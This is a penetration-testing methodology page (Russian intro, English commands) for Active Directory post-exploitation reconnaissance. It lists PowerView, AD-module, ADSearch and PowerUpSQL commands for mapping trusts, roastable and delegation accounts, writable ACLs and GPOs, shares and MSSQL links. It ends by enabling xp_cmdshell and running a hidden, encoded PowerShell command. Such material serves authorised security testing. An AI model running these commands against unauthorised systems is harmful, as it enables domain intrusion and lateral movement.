Active Directory (пост‑экс.)
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Зафиксируйте роль в домене и допустимые техники (read‑only / согласованная эксплуатация).
- Соберите данные для картирования атаки (учётки, делегирование, доверия).
- Двигайтесь по сценариям раздела с планом отката и контролем DC.
- Команды и инструменты в блоках кода — на английском.
Методика
Domain
General Information
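# Domain object: PowerView-style cmdlet (Get-Domain) and the RSAT ActiveDirectory module form (Get-ADDomain).
Get-Domain [-Domain <DIFFERENT_DOMAIN>]
Get-ADDomain [-Identity <DOMAIN>]
# Domain controllers. -Discover lets the AD module locate a DC instead of requiring a fixed name.
Get-ADDomainController [-DomainName <DOMAIN>] [-Discover]
# Forest, host name and OS level of each DC; listed once (this line was duplicated).
Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | Select-Object Forest, Name, OSVersion | Format-List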
Forest
# Forest object: PowerView-style form, then the RSAT AD-module equivalent.
Get-Forest [-Forest <FOREST>]
Get-ADForest [-Identity <FOREST>]
# Domains that make up the forest.
Get-ForestDomain [-Forest <FOREST>]
Get-ADForest [-Identity <FOREST>] | Format-List Domains
# Global catalog servers of the forest.
Get-ForestGlobalCatalog [-Forest <FOREST>]
Get-ADForest | Select-Object -ExpandProperty GlobalCatalogs
Trust
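# Trust relationships of the current (or named) domain.
Get-DomainTrust [-Domain <DomainName>]
Get-ADTrust {-Filter * | -Identity "<Domain>"}
# Built-in Windows tool, no module required.
nltest /domain_trusts
# Enumerates trusts outward from the current domain and maps the domains reached.
Get-DomainTrustMapping
# Forest-level trusts; <FOREST> is the forest name (the placeholder was mis-quoted as <"FOREST>").
Get-ForestTrust [-Forest <FOREST>]
# Trust objects carrying forest-trust info, i.e. forest trusts, via the AD module.
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'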
Users
General Information
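# Single user, optionally only selected attributes.
Get-DomainUser -Identity <USERNAME> [-Properties DisplayName, MemberOf | Format-List]
# Enabled accounts only (userAccountControl without ACCOUNTDISABLE).
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE | Select-Object samaccountname
# AD-module form; the pipe into Select-Object was missing in the original line.
Get-ADUser -Filter * | Where-Object { $_.Enabled -eq $true } | Select-Object SamAccountName
# Detailed information about a user
Get-ADUser -Identity <USERNAME> -Properties *
.\ADSearch.exe --search "objectCategory=user"
# Accounts whose description contains "built".
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | Select-Object name, Description
# Group membership of a user (PowerView-style, then AD module).
Get-DomainGroup -UserName "<USERNAME>"
Get-ADPrincipalGroupMembership -Identity "<USERNAME>"
# Logon count and last password change. pwdLastSet is a FILETIME, hence FromFileTime;
# the original wrote $_pwdlastset (a nonexistent variable) instead of $_.pwdLastSet.
# Only the needed attributes are requested instead of -Properties *.
Get-ADUser -Filter * -Properties logoncount, pwdLastSet |
  Select-Object name, logoncount, @{Name = 'pwdLastSet'; Expression = { [datetime]::FromFileTime($_.pwdLastSet) } }
# Where members of a group (or a given user) are logged on; -CheckAccess also tests local admin rights on each host found.
Find-DomainUserLocation -Verbose [-CheckAccess] [{-UserGroupIdentity|-UserIdentity} <Identity>]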
Security
# Accounts with a servicePrincipalName set (Kerberos service accounts) - three equivalent lookups.
Get-DomainUser -SPN | Select-Object serviceprincipalname
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
.\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# Accounts flagged "Do not require Kerberos preauthentication".
Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True } -Properties DoesNotRequirePreAuth | Select-Object UserPrincipalName
# Descriptions containing "pass" - a common place for stored credentials that should be cleaned up.
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | Select-Object name, Description
# Hosts on which the current security context holds local administrator rights.
Find-LocalAdminAccess
# Accounts configured for constrained delegation (msDS-AllowedToDelegateTo populated).
Get-NetUser -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
.\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
Groups
# All groups; optionally narrow to names containing "Admins".
Get-DomainGroup [| Where-Object Name -like "*Admins*" | Select-Object SamAccountName]
Get-ADGroup -Filter * | Select-Object name
# More detailed version
Get-ADGroup -Filter * -Properties *
# Admin Groups
.\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins))" [--attributes cn,member]
# MSSQL Groups
.\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member
# Members of a group; -Recursive on the AD-module form expands nested groups.
Get-DomainGroupMember -Identity "Domain Admins" [| Select-Object MemberDistinguishedName]
Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object SamAccountName
# Groups a principal belongs to.
Get-ADPrincipalGroupMembership <USER>
# GPO-driven local-group membership: which domain objects a GPO places into a local group, and on which hosts.
Get-DomainGPOUserLocalGroupMapping [-Identity "<GROUP_NAME>" | -LocalGroup Administrators] | Select-Object ObjectName, GPODisplayName, ContainerName, ComputerName | Format-List
Computers
General Information
# Computer objects; optional projection of the common identifying attributes.
Get-NetComputer [| Select-Object samaccountname, DnsHostName, operatingsystem]
# Filter on the operating system string.
Get-DomainComputer -OperatingSystem "*Server 2016*"
# Get Name, IP and Operating System
# (resolves each dnshostname to its A record and attaches it as IPAddressV4).
Get-NetComputer -Properties name,dnshostname, OperatingSystem |
  ForEach-Object {
    $_ | Add-Member -NotePropertyName IPAddressV4 -NotePropertyValue (Resolve-DnsName -Type A -Name $_.dnshostname).IPAddress -Force
    $_
  } |
  Select-Object -Property name,dnshostname,IPAddressV4, OperatingSystem |
  Format-Table -AutoSize
Get-AdComputer -Filter * | Select-Object Name
# Reachability: PowerView-style -Ping, or one ICMP probe per host via the AD module.
Get-NetComputer -Ping
Get-ADComputer -Filter * -Properties DNSHostName | ForEach-Object { Test-Connection -Count 1 -ComputerName $_.DNSHostName | Format-List Address,IPV4Address,IPV6Address,ResponseTime }
# Sessions and local groups on a given host.
Get-NetLoggedon -ComputerName "<COMPUTER_NAME>" | Select-Object Username
Get-LoggedonLocal -ComputerName "<HOSTNAME>"
Get-NetLocalGroup -ComputerName "<HOSTNAME>"
# Get the members of Local Groups
Get-NetLocalGroupMember -ComputerName "<HOSTNAME>" -GroupName "<GROUP_NAME>"
Get-LastLoggedOn -ComputerName <HOSTNAME>
Security
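# ACEs on computer objects held by the current user: the ACE SID is resolved to DOMAIN\user
# and compared with $env:UserDomain\$env:Username.
Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs |
  ForEach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } |
  ForEach-Object { if ($_.Identity -eq $("$env:UserDomain\$env:Username")) { $_ | Select-Object -Property ObjectDN,ActiveDirectoryRights, AceType,ObjectAceType, Identity | Format-List } }
# Computers with unconstrained delegation (UAC flag TRUSTED_FOR_DELEGATION, 0x80000 = 524288;
# the LDAP rule 1.2.840.113556.1.4.803 is a bitwise AND). primarygroupid 515 = Domain Computers,
# so the AD-module form leaves out domain controllers.
Get-DomainComputer -UnConstrained | Select-Object samaccountname
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
.\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
# Computers with constrained delegation (msDS-AllowedToDelegateTo populated).
Get-DomainComputer -TrustedToAuth | Select-Object name,msds-allowedtodelegateto,useraccountcontrol | Format-List
Get-NetComputer | Where-Object {$_."msds-allowedtodelegateto" -ne $null} | Select-Object name, msds-allowedtodelegateto, useraccountcontrol | Format-List
Get-NetComputer <COMPUTER_NAME> | Select-Object -ExpandProperty msds-allowedtodelegateto | Format-List
# Any object (user or computer) with constrained delegation; listed once (this line was duplicated).
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
.\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# Write-type rights on computer objects held by domain principals. The SID prefix
# S-1-5-21-569305411-121244042-2357301523 is this page's example domain; substitute the assessed domain's SID.
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }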
Group Policy Objects (GPOs)
General Information
# GPOs sorted by display name; -ComputerIdentity restricts the list to those applied to one host.
Get-DomainGPO [-ComputerIdentity <COMPUTER_NAME>] -Properties DisplayName | Sort-Object -Property DisplayName
# Local-group membership settings defined in GPOs.
Get-DomainGPOLocalGroup [-ComputerIdentity <COMPUTER_NAME>] | Select-Object GPODisplayName, GroupName
# Who ends up in the local Administrators group through GPO, and on which machines.
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | Select-Object ObjectName, GPODisplayName, ContainerName, ComputerName | Format-List
# The reverse view, for a single host.
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity "<HOSTNAME>"
Get Modifiable GPOs
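# GPOs on which a domain principal holds a right that allows changing policy content.
# The SID prefix S-1-5-21-569305411-121244042-2357301523 is this page's example domain; replace it.
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty|GenericWrite" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
# Principals allowed to create GPO containers under CN=Policies (the DN is this page's example;
# replace the DC= components). ActiveDirectoryRights is a flags value, so it is tested with -match
# as on the line above; the original used -contains, which only matches when CreateChild is the sole right in the ACE.
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | Where-Object { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -match "CreateChild" } | ForEach-Object { ConvertFrom-SID $_.SecurityIdentifier }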
Organizational Units (OU)
# Organizational units: PowerView-style (optionally name-only, sorted) and AD module with all properties.
Get-DomainOU [-Properties Name | Sort-Object -Property Name]
Get-ADOrganizationalUnit -Filter * -Properties *
# Resolve a GPO referenced from an OU's gPLink attribute by the CN part of the link.
Get-DomainGPO -Identity "<GPLink_RelativeCN>"
Access Control Lists (ACLs)
# ACL of a single principal with rights GUIDs resolved (older and newer PowerView-style cmdlet names).
Get-ObjectAcl -SamAccountName "<USER>" -ResolveGUIDs
Get-DomainObjectAcl -ResolveGUIDs -SamAccountName "<USERNAME>"
# Same view through the AD: PSDrive; the DN is this page's example, substitute the object's own.
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=cs,DC=org').Access
# ACEs PowerView classifies as interesting (modification rights); optionally filter on the identity name.
Find-InterestingDomainAcl -ResolveGUIDs
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object { $_.IdentityReferenceName -match "RDPUsers" }
Shares
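# All shares exposed by domain computers.
Find-DomainShare
# Enumerate the Domain Shares the current user has access
# (listed once; the original repeated this line).
Find-DomainShare -CheckShareAccess
# Older PowerView-style cmdlets: share finder, file servers, file finder.
Invoke-ShareFinder -Verbose
Get-NetFileServer
Invoke-FileFinder -Verbose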
MSSQL
General Information
# SQL Server instances discovered in the domain (PowerUpSQL) and a connectivity test against one instance.
Get-SQLInstanceDomain
Get-SQLConnectionTest -Instance "<HOSTNAME,PORT>" | Format-List
# If there are several instances use the following one-liner
Get-SQLInstanceDomain | Get-SQLConnectionTest | Where-Object { $_.Status -eq "Accessible" } | Get-SQLServerInfo
# Version and service details of a single instance.
Get-SQLServerInfo -Instance "<HOSTNAME,PORT>"
Links
# Linked servers defined on an instance: directly in T-SQL, or via PowerUpSQL.
select * from master..sysservers
Get-SQLServerLink -Verbose -Instance "<HOSTNAME,PORT>"
# Follow links transitively and report every hop.
Get-SQLServerLinkCrawl -Verbose -Instance "<HOSTNAME,PORT>"
Perform Queries
# OPENQUERY runs the inner statement on the named linked server (the name here is this page's example).
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
# Run a query against one instance through PowerUpSQL.
Get-SQLQuery -Instance "<HOSTNAME,PORT>" -Query "select @@servername"
CMDShell
-- Current state of the xp_cmdshell option (value / value_in_use columns).
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'
-- Turns the option on; advanced options must be shown first. This is a server-level
-- configuration change that a monitored instance should log and alert on.
sp_configure 'Show Advanced Options', 1; RECONFIGURE;sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- NOTE(review): the leading double quote on the next line is unbalanced as written.
"EXEC xp_cmdshell 'powershell -w hidden -enc <ENCODED_COMMAND>';